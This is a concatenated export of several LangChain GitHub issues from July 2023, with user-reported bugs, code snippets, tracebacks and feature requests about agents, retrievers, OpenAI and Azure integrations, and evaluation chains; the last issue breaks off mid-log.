Alternatively, does anyone have any recommendations on how to better implement an exponential backoff? | Issue: Rate limiting on large Google Drive folder | https://api.github.com/repos/langchain-ai/langchain/issues/7325/comments | 3 | 2023-07-07T06:06:08Z | 2023-12-30T16:07:34Z | https://github.com/langchain-ai/langchain/issues/7325 | 1,792,853,218 | 7,325 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
I used RecursiveCharacterTextSplitter.from_tiktoken_encoder to split a document, and if I set chunk_size to 2000, OpenAI cannot answer my question by the documents, if I set chunk_size to 500, OpenAI can work very well. I want to know, As a rule of thumb, what is the best size for a chunk
### Suggestion:
_No response_ | What is the best size for a chunk | https://api.github.com/repos/langchain-ai/langchain/issues/7322/comments | 2 | 2023-07-07T05:42:08Z | 2023-10-14T20:10:37Z | https://github.com/langchain-ai/langchain/issues/7322 | 1,792,823,901 | 7,322 |
[
"langchain-ai",
"langchain"
] | ### System Info
Langchain version: v0.0.225
Python Version: 3.10
Deployed and running on AWS Lambda deployed with x86_64 architecture.
### Who can help?
@jacoblee93
### Information
- [x] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
def callChatModel(input, token):
print('Executing with input:', input)
llm = ChatOpenAI(model="gpt-3.5-turbo-0613",
temperature=0)`
history = DynamoDBChatMessageHistory(table_name="MemoryPy",
session_id=token)
memory = ConversationBufferWindowMemory(
k=20, memory_key='chat_history', chat_memory=history, input_key="input", return_messages=True)
zapier = ZapierNLAWrapper(zapier_nla_oauth_access_token=token)
zapier_toolkit = ZapierToolkit.from_zapier_nla_wrapper(zapier)
tools = load_tools(["serpapi"], llm=llm) + zapier_toolkit.tools
print(tools)
agent = initialize_agent(
tools, llm,
agent=AgentType.OPENAI_FUNCTIONS,
memory=memory,
verbose=True,
handle_parsing_errors=True,
)
resp = agent.run(input=input)
return resp
Input to the chat model is
`Executing with input: Look up a basic fact about the sun, no more than one sentence. Send this fact to <email>@gmail.com `
Execution logs from CloudWatch:
```
[1m> Entering new chain...[0m
[ERROR] InvalidRequestError: 'Gmail: Send Email' does not match '^[a-zA-Z0-9_-]{1,64}<!--EndFragment-->
</body>
</html> - 'functions.1.name'Traceback (most recent call last): File "/var/task/handler.py", line 152, in handle_chat chatResp = callChatModel(message, token) File "/var/task/handler.py", line 92, in callChatModel resp = agent.run(input=input) File "/var/task/langchain/chains/base.py", line 320, in run return self(kwargs, callbacks=callbacks, tags=tags, metadata=metadata)[ File "/var/task/langchain/chains/base.py", line 181, in __call__ raise e File "/var/task/langchain/chains/base.py", line 175, in __call__ self._call(inputs, run_manager=run_manager) File "/var/task/langchain/agents/agent.py", line 987, in _call next_step_output = self._take_next_step( File "/var/task/langchain/agents/agent.py", line 792, in _take_next_step output = self.agent.plan( File "/var/task/langchain/agents/openai_functions_agent/base.py", line 210, in plan predicted_message = self.llm.predict_messages( File "/var/task/langchain/chat_models/base.py", line 398, in predict_messages return self(messages, stop=_stop, **kwargs) File "/var/task/langchain/chat_models/base.py", line 348, in __call__ generation = self.generate( File "/var/task/langchain/chat_models/base.py", line 124, in generate raise e File "/var/task/langchain/chat_models/base.py", line 114, in generate self._generate_with_cache( File "/var/task/langchain/chat_models/base.py", line 261, in _generate_with_cache return self._generate( File "/var/task/langchain/chat_models/openai.py", line 371, in _generate response = self.completion_with_retry(messages=message_dicts, **params) File "/var/task/langchain/chat_models/openai.py", line 319, in completion_with_retry return _completion_with_retry(**kwargs) File "/var/task/tenacity/__init__.py", line 289, in wrapped_f return self(f, *args, **kw) File "/var/task/tenacity/__init__.py", line 379, in __call__ do = self.iter(retry_state=retry_state) File "/var/task/tenacity/__init__.py", line 314, in iter return fut.result() File "/var/lang/lib/python3.10/concurrent/futures/_base.py", line 451, in result return self.__get_result() File "/var/lang/lib/python3.10/concurrent/futures/_base.py", line 403, in __get_result raise self._exception File "/var/task/tenacity/__init__.py", line 382, in __call__ result = fn(*args, **kwargs) File "/var/task/langchain/chat_models/openai.py", line 317, in _completion_with_retry return self.client.create(**kwargs) File "/var/task/openai/api_resources/chat_completion.py", line 25, in create return super().create(*args, **kwargs) File "/var/task/openai/api_resources/abstract/engine_api_resource.py", line 153, in create response, _, api_key = requestor.request( File "/var/task/openai/api_requestor.py", line 298, in request resp, got_stream = self._interpret_response(result, stream) File "/var/task/openai/api_requestor.py", line 700, in _interpret_response self._interpret_response_line( File "/var/task/openai/api_requestor.py", line 763, in _interpret_response_line raise self.handle_error_response( | [ERROR] InvalidRequestError: 'Gmail: Send Email' does not match '^[a-zA-Z0-9_-]{1,64}<!--EndFragment-->
</body>
</html> - 'functions.1.name' Traceback (most recent call last): File "/var/task/handler.py", line 152, in handle_chat chatResp = callChatModel(message, token) File "/var/task/handler.py", line 92, in callChatModel resp = agent.run(input=input) File "/var/task/langchain/chains/base.py", line 320, in run return self(kwargs, callbacks=callbacks, tags=tags, metadata=metadata)[ File "/var/task/langchain/chains/base.py", line 181, in __call__ raise e File "/var/task/langchain/chains/base.py", line 175, in __call__ self._call(inputs, run_manager=run_manager) File "/var/task/langchain/agents/agent.py", line 987, in _call next_step_output = self._take_next_step( File "/var/task/langchain/agents/agent.py", line 792, in _take_next_step output = self.agent.plan( File "/var/task/langchain/agents/openai_functions_agent/base.py", line 210, in plan predicted_message = self.llm.predict_messages( File "/var/task/langchain/chat_models/base.py", line 398, in predict_messages return self(messages, stop=_stop, **kwargs) File "/var/task/langchain/chat_models/base.py", line 348, in __call__ generation = self.generate( File "/var/task/langchain/chat_models/base.py", line 124, in generate raise e File "/var/task/langchain/chat_models/base.py", line 114, in generate self._generate_with_cache( File "/var/task/langchain/chat_models/base.py", line 261, in _generate_with_cache return self._generate( File "/var/task/langchain/chat_models/openai.py", line 371, in _generate response = self.completion_with_retry(messages=message_dicts, **params) File "/var/task/langchain/chat_models/openai.py", line 319, in completion_with_retry return _completion_with_retry(**kwargs) File "/var/task/tenacity/__init__.py", line 289, in wrapped_f return self(f, *args, **kw) File "/var/task/tenacity/__init__.py", line 379, in __call__ do = self.iter(retry_state=retry_state) File "/var/task/tenacity/__init__.py", line 314, in iter return fut.result() File "/var/lang/lib/python3.10/concurrent/futures/_base.py", line 451, in result return self.__get_result() File "/var/lang/lib/python3.10/concurrent/futures/_base.py", line 403, in __get_result raise self._exception File "/var/task/tenacity/__init__.py", line 382, in __call__ result = fn(*args, **kwargs) File "/var/task/langchain/chat_models/openai.py", line 317, in _completion_with_retry return self.client.create(**kwargs) File "/var/task/openai/api_resources/chat_completion.py", line 25, in create return super().create(*args, **kwargs) File "/var/task/openai/api_resources/abstract/engine_api_resource.py", line 153, in create response, _, api_key = requestor.request( File "/var/task/openai/api_requestor.py", line 298, in request resp, got_stream = self._interpret_response(result, stream) File "/var/task/openai/api_requestor.py", line 700, in _interpret_response self._interpret_response_line( File "/var/task/openai/api_requestor.py", line 763, in _interpret_response_line raise self.handle_error_response(
-- | --
```
### Expected behavior
I'd expect the agent chain to just execute | Zapier Toolkit and Function Agents not compatible | https://api.github.com/repos/langchain-ai/langchain/issues/7315/comments | 2 | 2023-07-07T01:38:10Z | 2023-10-14T20:10:42Z | https://github.com/langchain-ai/langchain/issues/7315 | 1,792,553,905 | 7,315 |
[
"langchain-ai",
"langchain"
] | ### Issue with current documentation:
Python Documentation for Output Parser Unavailable
URL: https://python.langchain.com/docs/modules/prompts/output_parsers.html
### Idea or request for content:
I am currently taking the "Langchain/lesson/2/models, prompts, and parsers" course from deeplearning.ai. While working on the course material, I encountered difficulties with the output parser in Python. To seek assistance and better understand the usage of the output parser, I attempted to access the documentation for the Python implementation. However, I received a "page not found" error when trying to access the Python documentation. | DOC: Broken Python Information Link in Langchain Documentation | https://api.github.com/repos/langchain-ai/langchain/issues/7311/comments | 2 | 2023-07-07T00:02:09Z | 2023-07-07T16:31:22Z | https://github.com/langchain-ai/langchain/issues/7311 | 1,792,485,542 | 7,311 |
[
"langchain-ai",
"langchain"
] | ### System Info
I got error when try to load custom LLM for Llama-Index
```
# setup prompts - specific to StableLM
from llama_index.prompts.prompts import SimpleInputPrompt
system_prompt = """<|SYSTEM|># StableLM Tuned (Alpha version)
- StableLM is a helpful and harmless open-source AI language model developed by StabilityAI.
- StableLM is excited to be able to help the user, but will refuse to do anything that could be considered harmful to the user.
- StableLM is more than just an information source, StableLM is also able to write poetry, short stories, and make jokes.
- StableLM will refuse to participate in anything that could harm a human.
"""
# This will wrap the default prompts that are internal to llama-index
query_wrapper_prompt = SimpleInputPrompt("<|USER|>{query_str}<|ASSISTANT|>")
import torch
llm = HuggingFaceLLM(
context_window=4096,
max_new_tokens=256,
generate_kwargs={"temperature": 0.7, "do_sample": False, "return_dict_in_generate":True},
system_prompt=system_prompt,
query_wrapper_prompt=query_wrapper_prompt,
tokenizer_name="StabilityAI/stablelm-tuned-alpha-3b",
model_name="StabilityAI/stablelm-tuned-alpha-3b",
device_map="auto",
stopping_ids=[50278, 50279, 50277, 1, 0],
tokenizer_kwargs={"max_length": 4096},
)
# load in HF embedding model from langchain
embed_model = LangchainEmbedding(HuggingFaceEmbeddings())
service_context = ServiceContext.from_defaults(chunk_size=1024, llm=llm,embed_model=embed_model)
documents = SimpleDirectoryReader('data\\abnamro').load_data()
index = VectorStoreIndex.from_documents(documents, service_context=service_context,show_progress=True)
from langchain.agents import Tool
tools = [
Tool(
name="LlamaIndex",
func=lambda q: str(index.as_query_engine(
retriever_mode="embedding",
verbose=True,
service_context=service_context
).query(q)),
description="useful for when you want to answer questions about finance. The input to this tool should be a complete english sentence.",
return_direct=True,
),
]
from langchain.chains.conversation.memory import ConversationBufferMemory
from langchain.agents import initialize_agent
memory = ConversationBufferMemory(memory_key="chat_history", return_messages=True)
agent_executor = initialize_agent(
tools, llm, agent=AgentType.CONVERSATIONAL_REACT_DESCRIPTION,memory=memory
)
agent_executor.run(input="What is inflation in the Czech Republic?")
```
got
```
ValidationError Traceback (most recent call last)
Cell In[13], line 1
----> 1 agent_executor = initialize_agent(
2 tools, llm, agent=AgentType.CONVERSATIONAL_REACT_DESCRIPTION,memory=memory
3 )
4 agent_executor.run(input="What is inflation in the Czech Republic?")
File F:\anaconda\lib\site-packages\langchain\agents\initialize.py:57, in initialize_agent(tools, llm, agent, callback_manager, agent_path, agent_kwargs, tags, **kwargs)
55 agent_cls = AGENT_TO_CLASS[agent]
56 agent_kwargs = agent_kwargs or {}
---> 57 agent_obj = agent_cls.from_llm_and_tools(
58 llm, tools, callback_manager=callback_manager, **agent_kwargs
59 )
60 elif agent_path is not None:
61 agent_obj = load_agent(
62 agent_path, llm=llm, tools=tools, callback_manager=callback_manager
63 )
File F:\anaconda\lib\site-packages\langchain\agents\conversational\base.py:115, in ConversationalAgent.from_llm_and_tools(cls, llm, tools, callback_manager, output_parser, prefix, suffix, format_instructions, ai_prefix, human_prefix, input_variables, **kwargs)
105 cls._validate_tools(tools)
106 prompt = cls.create_prompt(
107 tools,
108 ai_prefix=ai_prefix,
(...)
113 input_variables=input_variables,
114 )
--> 115 llm_chain = LLMChain(
116 llm=llm,
117 prompt=prompt,
118 callback_manager=callback_manager,
119 )
120 tool_names = [tool.name for tool in tools]
121 _output_parser = output_parser or cls._get_default_output_parser(
122 ai_prefix=ai_prefix
123 )
File F:\anaconda\lib\site-packages\langchain\load\serializable.py:74, in Serializable.__init__(self, **kwargs)
73 def __init__(self, **kwargs: Any) -> None:
---> 74 super().__init__(**kwargs)
75 self._lc_kwargs = kwargs
File F:\anaconda\lib\site-packages\pydantic\main.py:341, in pydantic.main.BaseModel.__init__()
ValidationError: 1 validation error for LLMChain
llm
value is not a valid dict (type=type_error.dict)
```
### Who can help?
@hwchase17 @agola11
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Connect LlamaIndex with Langchain
### Expected behavior
Load custom LLM | Llama_index model as a tool for lang chain | https://api.github.com/repos/langchain-ai/langchain/issues/7309/comments | 5 | 2023-07-06T22:34:36Z | 2023-07-09T20:42:18Z | https://github.com/langchain-ai/langchain/issues/7309 | 1,792,391,896 | 7,309 |
[
"langchain-ai",
"langchain"
] | ### Feature request
It would be nice to add a maximal_marginal_relevance to the MongoDBAtlasVectorSearch vectorstore
### Motivation
This will bring help users to get more diverse results than the ones only based on the relevance score
### Your contribution
I'll write a PR | MongoDBAtlasVectorSearch vectorstore - add maximal_marginal_relevance method | https://api.github.com/repos/langchain-ai/langchain/issues/7304/comments | 2 | 2023-07-06T21:24:25Z | 2023-10-12T16:05:25Z | https://github.com/langchain-ai/langchain/issues/7304 | 1,792,265,347 | 7,304 |
[
"langchain-ai",
"langchain"
] | ### System Info
Langchain version: 0.0.225
Python version: 3.8.5
### Who can help?
@hwchase17
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
When ground truth and model prediction are both empty strings, the evaluation model returns 'INCORRECT'. I expect the evalution to return 'CORRECT'
I ran the below piece of code.
```
llm_bit = AzureChatOpenAI(deployment_name='gpt-4-32k', temperature=0)
test_gt = [{'question': 'What is the name of the company?', 'gt': 'Company A'}, {'question': 'What is the name of the building', 'gt': ''}]
test_output = [{'question': 'What is the name of the company?', 'prediction': 'Company A'}, {'question': 'What is the name of the building', 'prediction': ''}]
eval_chain = QAEvalChain.from_llm(llm_bit)
temp = eval_chain.evaluate(
test_gt, test_output, question_key="question", answer_key="gt", prediction_key="prediction"
)
temp
```
### Expected behavior
Received output: [{'text': 'CORRECT'}, {'text': 'INCORRECT'}]
Expected output: [{'text': 'CORRECT'}, {'text': 'CORRECT'}] | Evaluation returns 'INCORRECT' when ground truth is empty and prediction is empty | https://api.github.com/repos/langchain-ai/langchain/issues/7303/comments | 1 | 2023-07-06T21:20:21Z | 2023-10-12T16:05:30Z | https://github.com/langchain-ai/langchain/issues/7303 | 1,792,259,575 | 7,303 |
[
"langchain-ai",
"langchain"
] | ### Issue with current documentation:
I got this code that i want to move to the model gpt3.5-turbo since its 10 times cheaper than the text-davinci-003 but i get this error
```
ValueError: OpenAIChat currently only supports single prompt, got ["Use the following portion of a long document to see if any of the text is relevant to answer the question. \nReturn any relevant text verbatim.\nW H I T E PA P E R\nTHE FUTURE OF ART\nRelease\nV 3 . 1\nTable of Contents\n01 Abstract 02 Riwa Tech\nPg 3\nPg
4\n03 Market research 04 Technology\nPg 5\nPg 7\n05 Why we do this 06 How Riwa Tech works\nPg 12\nPg 14\n07 The future 08 Team 09 Coin distribution 10 Business model 11 Timeline\nPg 20\nPg 21\nPg 22\nPg 24\nPg 26\n2\nAbstract\nArt and antiques have always been an integral part of the global economy, and\nthis remains true
today. With the rise of digital platforms and technologies,\ntransaction methods have been revolutionized, but challenges such as\nprovenance, authentication, protection and preservation of cultural heritage\npersist. This white paper proposes integrating blockchain technology to improve\nthe industry's landscape and protect its unique value. Blockchain can provide\nsecure, transparent, and tamper-proof records for art and antiques, addressing\nnumerous issues. By combining traditional values and innovative technology, we\nQuestion: hi\nRelevant text, if any:", 'Use the following portion of a long document to see if any of the text is relevant to answer the question. \nReturn any relevant text verbatim.\nTag. The owners can know the current location anytime they want.\nBlockchain\nAppreciation, trading and collecting of artworks are gradually becoming a part of\npeople’s life pursuits. In the development of the art market industry, collectibles\nlack clear records of transactions and evidence systems that can be veri\x00ed,\nmaking it almost impossible to determine the source information of collectibles.\nCollectibles do not have an “ID” system, resulting in no records for artworks. This\nlack of traceability in the industry can easily lead to counterfeiters taking\nadvantage of the situation, resulting in a proliferation of counterfeit artworks and\naffecting the development of the industry.\nOwners who deposit collectibles to Riwa’s ecosystem will get NFTs backed by the\ncollectible. The NFT smart contract will inherit the basic and anti-counterfeit\ndetails. For every future transaction of
the collectible, the smart contract will\nQuestion: hi\nRelevant text, if any:', "Use the following portion of a long document to see if any of the text is relevant to answer the question. \nReturn any relevant text verbatim.\nRiwa's advanced 3D technology to create 3D NFT collections and establish their\nown virtual spaces for exhibitions and other purposes.\n20\nTeam\nVIONA ZHANG Founder & chairman Experienced in commercializing artists and artworks, with a successful record in corporate and brand management.\nPIERRE BRUNETOT CEO Ex-CEO and founder of Sante Nature with extensive experience in marketing and strategy.\nYINJI DAI Co-Founder
& Sales Manager Manager of the Asia Region and Co-founder. Over 17 years of experience in art and antiques industry management.\nAASHIR IFTIKHAR Chief Technical Of\x00cer at HashPotato Over 3 years of experience in mobile application development. Expert in Full Stack development.\nEDOUARD BRUNETOT COO CEO of Cobound helps
businesses grow through marketing, sales, and customer service tools.\nFABIEN CERCLET Sales manager Over 7 years in blockchain tech & economics, established strong marketing foundation.\n21\nCoin distribution\nInitial Coin Offering (ICO)\nQuestion: hi\nRelevant text, if any:", "Use the following portion of a long document
to see if any of the text is relevant to answer the question. \nReturn any relevant text verbatim.\nand transaction reliability of artworks within the market.\n1. Riwa dual anti-counterfeiting\n1.1 Electronic Tag (E-Tag) management system\nRiwa's E-Tag technology management system is ef\x00cient, accurate and reliable.\nThe system can automatically read real-time artwork\ninformation and\ndynamically track and detect artwork locations through an electronic map,\nimproving the timeliness and accuracy of issue detection. Each Riwa E-Tag has a\nunique identity code assigned to the artwork or antique it represents, and the\ntags are physically
non-replicable and indestructible. With large storage capacity,\nlong service life, and adaptability to indoor and outdoor environments, Riwa's E-\nTag also allows contactless information collection, pollution resistance, and high\nreliability.\n7\nUsers can access the Riwa system by sensing an item's E-Tag with a smartphone,\nobtaining detailed features, inspection count, origin, ownership change records,\nQuestion: hi\nRelevant text, if any:"]
```
I'm using RetrievalQAWithSourcesChain and FAISS, this is the code
```python
import os
from langchain.document_loaders import UnstructuredURLLoader
from langchain.text_splitter import CharacterTextSplitter
import pickle
import faiss
from langchain.vectorstores import FAISS
from langchain.embeddings import OpenAIEmbeddings
from langchain.chains import RetrievalQAWithSourcesChain
from langchain.chains.question_answering import load_qa_chain
from langchain import OpenAI
os.environ["OPENAI_API_KEY"] = "Apikey"
urls = [
'https://riwa.nftify.network/collection/riwa-nft'
]
loaders = UnstructuredURLLoader(urls=urls)
data = loaders.load()
docs = text_splitter.split_documents(data)
embeddings = OpenAIEmbeddings()
vectorStore_openAI = FAISS.from_documents(docs, embeddings)
with open("faiss_store_openai.pkl", "wb") as f:
pickle.dump(vectorStore_openAI, f)
with open("faiss_store_openai.pkl", "rb") as f:
VectorStore = pickle.load(f)
llm=OpenAI(temperature=0,model_name="gpt-3.5-turbo",max_tokens=32)
chain = RetrievalQAWithSourcesChain.from_llm(llm=llm, retriever=VectorStore.as_retriever())
question=input("What question you want to ask? : ")
print(chain({"question": str(question)}, return_only_outputs=True)["answer"])
```
I would really appreciate if someone could give me some guidance, i've been blocked in this problem for a while
### Idea or request for content:
_No response_ | DOC: <ValueError: OpenAIChat currently only supports single prompt, got ["Use the following portion of a long document to see if any of the text is relevant to answer the question."]'DOC: ' prefix> | https://api.github.com/repos/langchain-ai/langchain/issues/7302/comments | 3 | 2023-07-06T21:08:00Z | 2023-11-24T16:08:09Z | https://github.com/langchain-ai/langchain/issues/7302 | 1,792,242,224 | 7,302 |
[
"langchain-ai",
"langchain"
] | ### System Info
langchain=0.0.225, python=3.9.17, openai=0.27.8
openai.api_type = "azure", openai.api_version = "2023-05-15"
api_base, api_key, deployment_name environment variables all configured.
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce the behavior:
Note: This code is pulled directly from document loaders chapter of Langchain Chat With Your Data course with Harrison Chase and Andrew Ng. It downloads an audio file of a public youtube video and generates a transcript.
1. In a Jupyter notebook, configure your Azure OpenAI environment variables and add this code:
```
from langchain.document_loaders.generic import GenericLoader
from langchain.document_loaders.parsers import OpenAIWhisperParser
from langchain.document_loaders.blob_loaders.youtube_audio import YoutubeAudioLoader
```
2. Create and run a new cell with this inside:
```
url="<https://www.youtube.com/watch?v=jGwO_UgTS7I>"
save_dir="docs/youtube/"
loader = GenericLoader( YoutubeAudioLoader([url],save_dir), OpenAIWhisperParser() )
docs = loader.load()
```
4. At the transcribing step, it will fail on "InvalidRequestError".
Successfully executes the following steps:
```
[youtube] Extracting URL: https://www.youtube.com/watch?v=jGwO_UgTS7I
[youtube] jGwO_UgTS7I: Downloading webpage
[youtube] jGwO_UgTS7I: Downloading ios player API JSON
[youtube] jGwO_UgTS7I: Downloading android player API JSON
[youtube] jGwO_UgTS7I: Downloading m3u8 information
[info] jGwO_UgTS7I: Downloading 1 format(s): 140
[download] docs/youtube//Stanford CS229: Machine Learning Course, Lecture 1 - Andrew Ng (Autumn 2018).m4a has already been downloaded
[download] 100% of 69.76MiB
[ExtractAudio] Not converting audio docs/youtube//Stanford CS229: Machine Learning Course, Lecture 1 - Andrew Ng (Autumn 2018).m4a; file is already in target format m4a
Transcribing part 1!
```
```
InvalidRequestError Traceback (most recent call last)
Cell In[14], line 8
3 save_dir="docs/youtube/"
4 loader = GenericLoader(
5 YoutubeAudioLoader([url],save_dir),
6 OpenAIWhisperParser()
7 )
----> 8 docs = loader.load()
File /usr/local/lib/python3.9/site-packages/langchain/document_loaders/generic.py:90, in GenericLoader.load(self)
88 def load(self) -> List[Document]:
89 """Load all documents."""
---> 90 return list(self.lazy_load())
File /usr/local/lib/python3.9/site-packages/langchain/document_loaders/generic.py:86, in GenericLoader.lazy_load(self)
84 """Load documents lazily. Use this when working at a large scale."""
85 for blob in self.blob_loader.yield_blobs():
---> 86 yield from self.blob_parser.lazy_parse(blob)
File /usr/local/lib/python3.9/site-packages/langchain/document_loaders/parsers/audio.py:51, in OpenAIWhisperParser.lazy_parse(self, blob)
49 # Transcribe
50 print(f"Transcribing part {split_number+1}!")
---> 51 transcript = openai.Audio.transcribe("whisper-1", file_obj)
53 yield Document(
54 page_content=transcript.text,
55 metadata={"source": blob.source, "chunk": split_number},
56 )
File /usr/local/lib/python3.9/site-packages/openai/api_resources/audio.py:65, in Audio.transcribe(cls, model, file, api_key, api_base, api_type, api_version, organization, **params)
55 requestor, files, data = cls._prepare_request(
56 file=file,
57 filename=file.name,
(...)
62 **params,
63 )
64 url = cls._get_url("transcriptions")
---> 65 response, _, api_key = requestor.request("post", url, files=files, params=data)
66 return util.convert_to_openai_object(
67 response, api_key, api_version, organization
68 )
File /usr/local/lib/python3.9/site-packages/openai/api_requestor.py:298, in APIRequestor.request(self, method, url, params, headers, files, stream, request_id, request_timeout)
277 def request(
278 self,
279 method,
(...)
286 request_timeout: Optional[Union[float, Tuple[float, float]]] = None,
287 ) -> Tuple[Union[OpenAIResponse, Iterator[OpenAIResponse]], bool, str]:
288 result = self.request_raw(
289 method.lower(),
290 url,
(...)
296 request_timeout=request_timeout,
297 )
--> 298 resp, got_stream = self._interpret_response(result, stream)
299 return resp, got_stream, self.api_key
File /usr/local/lib/python3.9/site-packages/openai/api_requestor.py:700, in APIRequestor._interpret_response(self, result, stream)
692 return (
693 self._interpret_response_line(
694 line, result.status_code, result.headers, stream=True
695 )
696 for line in parse_stream(result.iter_lines())
697 ), True
698 else:
699 return (
--> 700 self._interpret_response_line(
701 result.content.decode("utf-8"),
702 result.status_code,
703 result.headers,
704 stream=False,
705 ),
706 False,
707 )
File /usr/local/lib/python3.9/site-packages/openai/api_requestor.py:763, in APIRequestor._interpret_response_line(self, rbody, rcode, rheaders, stream)
761 stream_error = stream and "error" in resp.data
762 if stream_error or not 200 <= rcode < 300:
--> 763 raise self.handle_error_response(
764 rbody, rcode, resp.data, rheaders, stream_error=stream_error
765 )
766 return resp
InvalidRequestError: Resource not found
```
Usually, with "resource not found" errors, the message will tell you to input api_key or deployment_name. I'm not sure what this means, as none of the Loader methods take in these as params.
### Expected behavior
Expected behavior is to finish four parts of transcription and "load" as doc in docs variable. | langchain.document_loaders.generic GenericLoader not working on Azure OpenAI - InvalidRequestError: Resource Not Found, cannot detect declared resource | https://api.github.com/repos/langchain-ai/langchain/issues/7298/comments | 5 | 2023-07-06T19:16:57Z | 2024-02-10T16:22:03Z | https://github.com/langchain-ai/langchain/issues/7298 | 1,792,095,489 | 7,298 |
[
"langchain-ai",
"langchain"
] | ### System Info
Langchain: 0.0.225
OS: Arch Linux
Python: 3.11
### Who can help?
@hwchase17
@agola11
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [X] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Use any of langchain's openai chat agents with the memory/chat history feature results in the chat history/memory being sent to the openai API in the SYSTEM message, and with incorrect roles specified.
### Expected behavior
While that might be appropriate for certain types of message (Maybe compressed or summarized from older conversations), I expected the chat history memory to be utilizing openai's [messages](https://platform.openai.com/docs/api-reference/chat#chat/create-messages) parameter.
It's much easier to parse (If ever needed) since it's an array of messages. This is related to https://github.com/hwchase17/langchain/issues/7285 which is an even bigger issue that addressing this one could resolve. | OpenAI Chat agents don't make use of OpenAI API `messages` parameter. | https://api.github.com/repos/langchain-ai/langchain/issues/7291/comments | 3 | 2023-07-06T17:42:57Z | 2023-10-14T20:10:48Z | https://github.com/langchain-ai/langchain/issues/7291 | 1,791,972,879 | 7,291 |
[
"langchain-ai",
"langchain"
] | ### System Info
LangChain: v0.0.225
OS: Ubuntu 22.04
### Who can help?
@agola11
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [X] Callbacks/Tracing
- [ ] Async
### Reproduction
### Code
```python
import langchain
from chromadb.config import Settings
from langchain.callbacks.streaming_stdout import BaseCallbackHandler
from langchain.chains import ConversationalRetrievalChain
from langchain.embeddings import HuggingFaceEmbeddings
from langchain.llms import LlamaCpp
from langchain.memory import ConversationBufferMemory
from langchain.schema.document import Document
from langchain.vectorstores import Chroma
langchain.debug = True
class DocumentCallbackHandler(BaseCallbackHandler):
def on_retriever_end(
self,
documents: Sequence[Document],
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
**kwargs: Any,
) -> Any:
print(f"on_retriever_end() CALLED with {len(documents)} documents")
def setup():
llm = LlamaCpp(
model_path="models/GPT4All-13B-snoozy.ggml.q5_1.bin",
n_ctx=4096,
n_batch=8192,
callbacks=[],
verbose=False,
use_mlock=True,
n_gpu_layers=60,
n_threads=8,
)
embeddings = HuggingFaceEmbeddings(model_name="all-MiniLM-L6-v2")
db = Chroma(
persist_directory="./db",
embedding_function=embeddings,
client_settings=Settings(
chroma_db_impl="duckdb+parquet",
persist_directory="./db",
anonymized_telemetry=False,
),
)
retriever = db.as_retriever(search_kwargs={"k": 4})
memory = ConversationBufferMemory(memory_key="chat_history", return_messages=True)
return ConversationalRetrievalChain.from_llm(
llm=llm, retriever=retriever, memory=memory, callbacks=[DocumentCallbackHandler()]
)
def main():
qa = setup()
while True:
question = input("\nEnter your question: ")
answer = qa(question)["answer"]
print(f"\n> Answer: {answer}")
if __name__ == "__main__":
main()
```
### Output
```
ggml_init_cublas: found 1 CUDA devices:
Device 0: Quadro RTX 6000
llama.cpp: loading model from models/GPT4All-13B-snoozy.ggml.q5_1.bin
llama_model_load_internal: format = ggjt v2 (pre #1508)
llama_model_load_internal: n_vocab = 32000
llama_model_load_internal: n_ctx = 4096
llama_model_load_internal: n_embd = 5120
llama_model_load_internal: n_mult = 256
llama_model_load_internal: n_head = 40
llama_model_load_internal: n_layer = 40
llama_model_load_internal: n_rot = 128
llama_model_load_internal: ftype = 9 (mostly Q5_1)
llama_model_load_internal: n_ff = 13824
llama_model_load_internal: n_parts = 1
llama_model_load_internal: model size = 13B
llama_model_load_internal: ggml ctx size = 0.09 MB
llama_model_load_internal: using CUDA for GPU acceleration
llama_model_load_internal: mem required = 2165.28 MB (+ 1608.00 MB per state)
llama_model_load_internal: allocating batch_size x 1 MB = 512 MB VRAM for the scratch buffer
llama_model_load_internal: offloading 40 repeating layers to GPU
llama_model_load_internal: offloading non-repeating layers to GPU
llama_model_load_internal: offloading v cache to GPU
llama_model_load_internal: offloading k cache to GPU
llama_model_load_internal: offloaded 43/43 layers to GPU
